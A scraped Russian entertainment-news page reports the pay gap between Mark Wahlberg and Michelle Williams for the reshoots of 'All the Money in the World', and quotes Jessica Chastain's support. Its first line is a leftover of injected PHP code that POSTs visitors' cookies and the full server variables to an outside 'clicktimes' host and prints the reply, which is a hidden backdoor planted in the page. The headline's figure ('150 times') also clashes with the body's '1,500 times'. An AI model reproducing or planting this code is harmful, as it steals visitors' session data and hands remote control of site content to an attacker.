array("header"=>"User-Agent: PHP Modules clicktimes\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($clicktimes_result) echo $clicktimes_result; ?>
 
Марк Уолберг получил в 150 больше, чем Мишель Уильямс
Американские правозащитники отчаянно бьются за равенство полов, однако эта борьба пока не принесла плоды. В зарубежных СМИ то и дело всплывают факты, которые доказывают, что мужчинам живется куда лучше, чем женщинам. На этот раз в эпицентре скандала оказались создатели фильма «Все деньги мира». Как оказалось, продюсеры заплатили Марку Уолбергу в 1,5 тысячи раз больше, чем Мишель Уильямс. Актер получил за пересъемку сцены $1,5 миллиона, а его коллега – меньше $1000. Звезда «Интерстеллара» Джессика Честейн поддержала Мишель Уильямс в своем Twitter.
Пожалуйста, посмотрите, как играла Мишель в фильме «Все деньги мира». Она блестящая актриса, обладательница «Золотого глобуса», которую номинировали на «Оскар». Она работает в этой отрасли уже 20 лет и явно заслуживает больше одного процента зарплаты своего мужа.
Напомним, что режиссеру Ридли Скотту пришлось переснимать некоторые сцены фильма после скандала с Кевином Спейси. Актера отстранили от работы, и его заменил Кристофер Пламмер.
Источник:
Если Вам понравилась или не понравилась статья можете проголосовать за Марк Уолберг получил в 150 больше, чем Мишель Уильямс
90290

Реклама на сайте

Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

Реклама на сайте